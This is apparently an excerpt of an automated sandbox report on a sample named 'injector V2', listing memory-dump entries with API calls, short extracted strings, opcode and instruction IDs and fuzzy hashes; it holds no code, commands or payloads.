                                                                                    • Instruction Fuzzy Hash: 2D91D671604B808FE325CB35D4A17B7BBD2AF53304F58845EC0EB8B692D7796406CB65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Y`Pb$yVh]
                                                                                    • API String ID: 0-2084830440
                                                                                    • Opcode ID: f52b21de84ce6a21add13dfa8e557a0538738c7fbc7296b4cc640362d4c6293c
                                                                                    • Instruction ID: f722a9b3a85af15d1d0177742b6600c000020fd4e026f340dbf6347df914f1d4
                                                                                    • Opcode Fuzzy Hash: f52b21de84ce6a21add13dfa8e557a0538738c7fbc7296b4cc640362d4c6293c
                                                                                    • Instruction Fuzzy Hash: 64517C317483628BD7248E24A9A12B7FB90EF42350F99476EDA91477C2D33DD849D3CA
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00443598,00000000,00000001,00443588), ref: 00423219
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID:
                                                                                    • API String ID: 542301482-0
                                                                                    • Opcode ID: 3bab1d380f97032a9f315e65e3d7766baebf32abcf04ab904765ecd122f1eb22
                                                                                    • Instruction ID: 71ce44aec7d3b8c1f5f9fb612631e1477a0120926aca0f6bb1b722cf7af0fba3
                                                                                    • Opcode Fuzzy Hash: 3bab1d380f97032a9f315e65e3d7766baebf32abcf04ab904765ecd122f1eb22
                                                                                    • Instruction Fuzzy Hash: 7951CCB0700320ABDB20DF24DC86B6733B4EF8576AF444559E9858B390E77DEA05C72A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !
                                                                                    • API String ID: 0-2553554435
                                                                                    • Opcode ID: 2140aaf378637c4364fd0247320baf6ac4bb0000a29956785586fa384e716162
                                                                                    • Instruction ID: f49577d193c8abb6453e9474ca47d3b4d1bfe81202629265be6873369bba8e08
                                                                                    • Opcode Fuzzy Hash: 2140aaf378637c4364fd0247320baf6ac4bb0000a29956785586fa384e716162
                                                                                    • Instruction Fuzzy Hash: 3DC167B6A043209BC724DF24D85162BB3F1EFD5314F59852EE8C697381E77CD9058396
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "
                                                                                    • API String ID: 0-123907689
                                                                                    • Opcode ID: 67a9909f13c84bda9c902c05a983fdda779d17265ce718b46d8b7cf5fc1650fc
                                                                                    • Instruction ID: b8070625620b0bc9f221c6e9060029e60e68ddcd4ffb9493ab494252952fbdc1
                                                                                    • Opcode Fuzzy Hash: 67a9909f13c84bda9c902c05a983fdda779d17265ce718b46d8b7cf5fc1650fc
                                                                                    • Instruction Fuzzy Hash: ABD12571B083299FC714CE25E48176BB7E5EF84314F48896EE99987382DB78DC0587C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: /AG
                                                                                    • API String ID: 0-429173468
                                                                                    • Opcode ID: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
                                                                                    • Instruction ID: db9a0b4dfea41108335f0a407c7d33345c3d109be444455fd645843256c24d7d
                                                                                    • Opcode Fuzzy Hash: 5bf9bc4743e92e801110c16e1e1a6798670fd257678139d8f1a4f53805c9afb8
                                                                                    • Instruction Fuzzy Hash: 2B6136B2610B018BC324CF25C9916A3BBF2FF96314F49995DC4D68BB95E738A806CB44
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: bNLV
                                                                                    • API String ID: 0-346797206
                                                                                    • Opcode ID: 0013062a79eb5dbc58cabba1237e6767f189077d539472ca9c7babac2483338f
                                                                                    • Instruction ID: afda5bf75f1f78cb49c648d636ab67f5a1453f3ecd0fd1dd5d0ff7308ee6564c
                                                                                    • Opcode Fuzzy Hash: 0013062a79eb5dbc58cabba1237e6767f189077d539472ca9c7babac2483338f
                                                                                    • Instruction Fuzzy Hash: EC5148B1608B814BD319CF38C8603E3BBA2AF93308F5DC5ADC1E24B356D77965468758
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: bNLV
                                                                                    • API String ID: 0-346797206
                                                                                    • Opcode ID: 0a4a9a8859d789d4f71a42b94f912eacdcaf339e6f1ceb799e64ce8c398cced0
                                                                                    • Instruction ID: 27a159d7ac2624ea253f79df2db77bdd57b40a2df15003da0a9ee6f62b1e2e80
                                                                                    • Opcode Fuzzy Hash: 0a4a9a8859d789d4f71a42b94f912eacdcaf339e6f1ceb799e64ce8c398cced0
                                                                                    • Instruction Fuzzy Hash: DD515A70604B908AD326CF39D4903E3BBE2AF97308F58C5AEC1E60B356D6BD6546871C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .L6d
                                                                                    • API String ID: 0-3689564033
                                                                                    • Opcode ID: 52a1620b55584a0b3069d913d873da39473c9a49c859e39cccb799168cc7aa56
                                                                                    • Instruction ID: b3b80b292b9c2592f918aecac32d9bf9aff12df46ab72a7f5f46870c8d66b613
                                                                                    • Opcode Fuzzy Hash: 52a1620b55584a0b3069d913d873da39473c9a49c859e39cccb799168cc7aa56
                                                                                    • Instruction Fuzzy Hash: 1C51F6B4A047508FE3258B39D4907B3BBE0EF67300F24489ED4E787392D278A5458B69
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: SW
                                                                                    • API String ID: 0-625006655
                                                                                    • Opcode ID: 869c7119e643443874cd61e064ba24bf401558557341c27c2f31387fee03dab2
                                                                                    • Instruction ID: 5d9f2363fabf42677fb571d2220c82bc289fbd14246ff3687941838be9d0c232
                                                                                    • Opcode Fuzzy Hash: 869c7119e643443874cd61e064ba24bf401558557341c27c2f31387fee03dab2
                                                                                    • Instruction Fuzzy Hash: 4051267194C3938AD334DF39D861BABBAE1AFC6304F08893DD8D997692E7780504D786
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3019521637
                                                                                    • Opcode ID: 46ae62597b49b084656ba533626074b253d2be57493eef55916a1d20d10db3d5
                                                                                    • Instruction ID: 5f1565635af4d5f91d3e1fbc5b9aff3f95ec9d96fa10469e2fbb41994dbd59c0
                                                                                    • Opcode Fuzzy Hash: 46ae62597b49b084656ba533626074b253d2be57493eef55916a1d20d10db3d5
                                                                                    • Instruction Fuzzy Hash: 543137B1A043006BE610AA15DC41B7BB3A8EF9E718F04653EFD86972D3E3B5DC15825A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 7654
                                                                                    • API String ID: 2994545307-4024152101
                                                                                    • Opcode ID: bed417bb34f37d25c7c923fb16c4ecbb63d8fcad9ac46b1c89647715ee02ff4a
                                                                                    • Instruction ID: 07b2bc39b660a2127a801fcb1b0e8c0ba885f34615d13a0a3f58d585ff3512a4
                                                                                    • Opcode Fuzzy Hash: bed417bb34f37d25c7c923fb16c4ecbb63d8fcad9ac46b1c89647715ee02ff4a
                                                                                    • Instruction Fuzzy Hash: 573125346182409BD328CB25C491B7BB761AF91314F54893ED08B232E2CB399C52CF5B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-3019521637
                                                                                    • Opcode ID: e3e5cbc5dd9bbf2317c34db2ffb6bb1115f1eabd1792bfa7cb93aa03cdf65a33
                                                                                    • Instruction ID: 59d445325523166152dc146d909279a4f6499651f5095f3f0f56464fc1f6b4d1
                                                                                    • Opcode Fuzzy Hash: e3e5cbc5dd9bbf2317c34db2ffb6bb1115f1eabd1792bfa7cb93aa03cdf65a33
                                                                                    • Instruction Fuzzy Hash: 5821E5747486218BC7188F14A48193FB356FFA2314FA5511ED84247662D378DC639BCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3019521637
                                                                                    • Opcode ID: 4360b9a0dbcb048b31625e884e474d230f3ccf18c6803161638f971b72f92b1f
                                                                                    • Instruction ID: ca349acebf200c130f07c25eb8c9f900c512d4fe60b0edf43c0723bea5fd6d56
                                                                                    • Opcode Fuzzy Hash: 4360b9a0dbcb048b31625e884e474d230f3ccf18c6803161638f971b72f92b1f
                                                                                    • Instruction Fuzzy Hash: CD01D274A04610CBDB149F10E99053FB7A1FB86314F58956DDA910B252D374DC00CB5E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3019521637
                                                                                    • Opcode ID: 1afb893726f46772e7593d518e2cfa7ea3916efc63878d48ce905e34f30bf491
                                                                                    • Instruction ID: de03f4f47443a8bd39c365dfb0ef4407cee9922f27402f28625e57e8ebf2b2aa
                                                                                    • Opcode Fuzzy Hash: 1afb893726f46772e7593d518e2cfa7ea3916efc63878d48ce905e34f30bf491
                                                                                    • Instruction Fuzzy Hash: FFF0AF30B0A2218BD614CF14B95113FFBE1AFD6320F69562EE48227651CB78E842C78F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 46058562c2914b172cae08c48a1055d684e203c1e75c7eba90490f348242528e
                                                                                    • Instruction ID: 51b159df0d36f693b031eaab9385a80d08230fa316fccbb5eeefeff4cb7c6d8c
                                                                                    • Opcode Fuzzy Hash: 46058562c2914b172cae08c48a1055d684e203c1e75c7eba90490f348242528e
                                                                                    • Instruction Fuzzy Hash: 5DF1D2356087418FC724CF29C88066BFBE2EFD9304F08882DE5DA87791E679E914CB56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24e978d94e56725f1d1b472ecd9cf3898dfda095cfba4a6f6882cce1a2b1b29e
                                                                                    • Instruction ID: d8a9fec0027e62857f9e7bfb6e5d6553db6d99cc1398c4a4585c21a2a51ac729
                                                                                    • Opcode Fuzzy Hash: 24e978d94e56725f1d1b472ecd9cf3898dfda095cfba4a6f6882cce1a2b1b29e
                                                                                    • Instruction Fuzzy Hash: BF9149756447408FE721CF35C8C1BA7BBE2EFA2304F58856ED0DA8B386DA39A406C755
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d32814b42b1c4023a689e78a7efeb042f14edfef4c22c81f02d20c71882a955d
                                                                                    • Instruction ID: 880aa2baef86b0448762cace4d4ccd93be02fb106297aa52c3179b4be83c6bda
                                                                                    • Opcode Fuzzy Hash: d32814b42b1c4023a689e78a7efeb042f14edfef4c22c81f02d20c71882a955d
                                                                                    • Instruction Fuzzy Hash: 15811071A183218BC714CF28D85166BB3F1FFD6708F48892DE8858B390E779D905C79A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ece5df5b6cd9393a726ded35b5de15b49529ff404c918f7e2f0173a43e32689a
                                                                                    • Instruction ID: 5c0c2071a4dcea8812aeb69c0a8b309c6f21e53569e031a8c36ce4244bbbab29
                                                                                    • Opcode Fuzzy Hash: ece5df5b6cd9393a726ded35b5de15b49529ff404c918f7e2f0173a43e32689a
                                                                                    • Instruction Fuzzy Hash: 5791E271A083118BD724CF58C480A2BB7F2FF89704F19892DEA854B351DB79EC25C789
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 553dfa5f3bbfa688dded42275a24ce6ca5cd46ad06b52228966fd15d9d5d520a
                                                                                    • Instruction ID: d0e0070986afb1801afce02a0cda79511d46dc230b4459934c59a808afd21370
                                                                                    • Opcode Fuzzy Hash: 553dfa5f3bbfa688dded42275a24ce6ca5cd46ad06b52228966fd15d9d5d520a
                                                                                    • Instruction Fuzzy Hash: 937139315483818BD7258A78994C367BBD19F52304F18897FD8C69B3C2D2BCC945D39A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b519613685f07e80bbd9a7bb98aeb69bda72d3d3ee017d028535196f28c4bf3b
                                                                                    • Instruction ID: cd0b3e3533dd20fca185efeb8ae37a451f97122a8cedeb124bcf32d4b59a7fad
                                                                                    • Opcode Fuzzy Hash: b519613685f07e80bbd9a7bb98aeb69bda72d3d3ee017d028535196f28c4bf3b
                                                                                    • Instruction Fuzzy Hash: DC512374A00205DBEF048F69DC46BBFB7B1FB8A314F10552EEA15A7291D7B99C01CB98
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 62470d2211a21ddd1af935ebe00ec76f225f8dc3dfb16d34274c3483cb670149
                                                                                    • Instruction ID: 42addddd87d91ddbe1cf349074bdd9d0cf00f2e64c64de931b6530428438a1cb
                                                                                    • Opcode Fuzzy Hash: 62470d2211a21ddd1af935ebe00ec76f225f8dc3dfb16d34274c3483cb670149
                                                                                    • Instruction Fuzzy Hash: 11715779204B01CFDB248F21D894B57B7F5FB4A301F14882DE5AA876A1D771E919CF48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a4ab4ca7fff76a47d068eee754a10f99cc795f7ca8f0d74a3a1a6a19be915fb3
                                                                                    • Instruction ID: 2031b64c494bd07dc0a8d339c49fbe6ba61d9ab32cbe0a574a32405f6ed6b2c1
                                                                                    • Opcode Fuzzy Hash: a4ab4ca7fff76a47d068eee754a10f99cc795f7ca8f0d74a3a1a6a19be915fb3
                                                                                    • Instruction Fuzzy Hash: D5518779204B01CFDB248F21DC94B67B7B9FB0A301F10882DE5AA876A1D771E919CF58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c53f7a2151e56eef5c59a7df9eda93d5b2c34911c251c26dec7387734fd79ff
                                                                                    • Instruction ID: 8cd7e6e44a76840e0cf9c864b4dc42ee17bbf449749c8835b13b38f734b63783
                                                                                    • Opcode Fuzzy Hash: 4c53f7a2151e56eef5c59a7df9eda93d5b2c34911c251c26dec7387734fd79ff
                                                                                    • Instruction Fuzzy Hash: E751807550C3940BC7258A2884902BBF7E29BDE308F185A6EF8D68B387D17CDD46C785
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3428ae193c7bcd2e174d8a32087c8df524dc9356a0fe233551d390cfdcb49e04
                                                                                    • Instruction ID: 24a54a2c8675229cdaea495314ee0bf535e293b52c9439375662e7bc93ac26ca
                                                                                    • Opcode Fuzzy Hash: 3428ae193c7bcd2e174d8a32087c8df524dc9356a0fe233551d390cfdcb49e04
                                                                                    • Instruction Fuzzy Hash: 7F3129B6A483509BD310CF19D8806ABBBE2BFD4718F088A2DE4C557345CB34D90ACBD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
                                                                                    • Instruction ID: 11f603fb0d9f721776d2b97ae2b39e9d4217bc6374cc303b5386588e03e1bb29
                                                                                    • Opcode Fuzzy Hash: 3940700e1baaa0d0eeee129a3909170ae08500f5026dffdff98a13603b77694a
                                                                                    • Instruction Fuzzy Hash: 1521E533A52A184BD3108D69CC80796729297DD338F3E46B989749B7D2D87B6C1386C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                    • Instruction ID: 65453c637e7d10ab468198b684bbdf40907617de88f130c8a64cfe96f977c526
                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                    • Instruction Fuzzy Hash: CF112933A045E44EC3128E3C8400565BFE30A97635F5D539AF4B89B2D2D62A8E8A8359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0dd737344ac88ef9878c80e5d4e4098b04a22f2bbfbe13be4050065726199be3
                                                                                    • Instruction ID: fa038fc164eeecd97fe6772c4f5c4ecdd241b064536ba8883c776843f79b63ce
                                                                                    • Opcode Fuzzy Hash: 0dd737344ac88ef9878c80e5d4e4098b04a22f2bbfbe13be4050065726199be3
                                                                                    • Instruction Fuzzy Hash: C10192B570071147D620AE55A4D0727A3A8DF90B08F48843EDA449B743EB7EFC0487D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 739e20d83a75b12cc4edc0c0cb4c03b76f2ec2cbdeb089ca078a816bd730316f
                                                                                    • Instruction ID: ab629cee7c6d59a73fa31a6ef5f2130a65cb21d096da26a4ed122ccb78a54fc1
                                                                                    • Opcode Fuzzy Hash: 739e20d83a75b12cc4edc0c0cb4c03b76f2ec2cbdeb089ca078a816bd730316f
                                                                                    • Instruction Fuzzy Hash: 971129696447808FD319CB3AD8543A3BBA35FD7210F5C85AEC4D58B386CB385407C316
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c2c1597807e07014396e67b3087708c85ca5cdec378a0f3833d6b9652d686c78
                                                                                    • Instruction ID: 8a03683c1672b3882a45e19e6ca236dd169e47525db707a9347a8ccc0bc35e0e
                                                                                    • Opcode Fuzzy Hash: c2c1597807e07014396e67b3087708c85ca5cdec378a0f3833d6b9652d686c78
                                                                                    • Instruction Fuzzy Hash: 8701D43064C3516BE300DF64E856B6BBBE4DB92304F549C2DF08097252EB78D60A875A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 59b0d329a4713a373ddf3faf30a698ba87af2c1adf7a79306f4269258a6df32d
                                                                                    • Instruction ID: 81cdd60912a32447842a30ee473c6ea26498f306dd56cb5fe75476b0e5a86237
                                                                                    • Opcode Fuzzy Hash: 59b0d329a4713a373ddf3faf30a698ba87af2c1adf7a79306f4269258a6df32d
                                                                                    • Instruction Fuzzy Hash: 7401DB35A14740CFE724CF35D445BA377E29B52304F08846DD0CB9B356C6796405CB59
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9cb268d8788da9834873df3f7ec4d4cafb1614ec54c6f70f9c1df89b9735a9ad
                                                                                    • Instruction ID: db7a20aa1f5cd9bcf6f29cfc8e7f396a982dd41fada3cd5c80b4433a2b6e395f
                                                                                    • Opcode Fuzzy Hash: 9cb268d8788da9834873df3f7ec4d4cafb1614ec54c6f70f9c1df89b9735a9ad
                                                                                    • Instruction Fuzzy Hash: B9D0C22064B7C44BC3170B309940163BF329F93110F095ADEC0C11B497C255E406C39D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b7d2b2c64cac453b5bb9e7438d69aa090942da6eb846d5477aab4c7854883e6
                                                                                    • Instruction ID: 39eac468691ef52aae9fb63907073c71273284e47be281139a51e628e6ad5438
                                                                                    • Opcode Fuzzy Hash: 1b7d2b2c64cac453b5bb9e7438d69aa090942da6eb846d5477aab4c7854883e6
                                                                                    • Instruction Fuzzy Hash: 70C04C2869A0009B93088F219950575A266978B619B14B529885673259E124D422560D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cb2ad09f2ef53dc0c73fb9aec5719d9427ca59ae68421d84f0603d9519cf9a2f
                                                                                    • Instruction ID: c299feb74349660be83788b40f0038ac613b869166528d91592882ccfc08d4f1
                                                                                    • Opcode Fuzzy Hash: cb2ad09f2ef53dc0c73fb9aec5719d9427ca59ae68421d84f0603d9519cf9a2f
                                                                                    • Instruction Fuzzy Hash: AFC0923CA8900087930CCF21DA506B1F37BA797609A18F12DCC663322AE130E4229A0D
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2295101101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
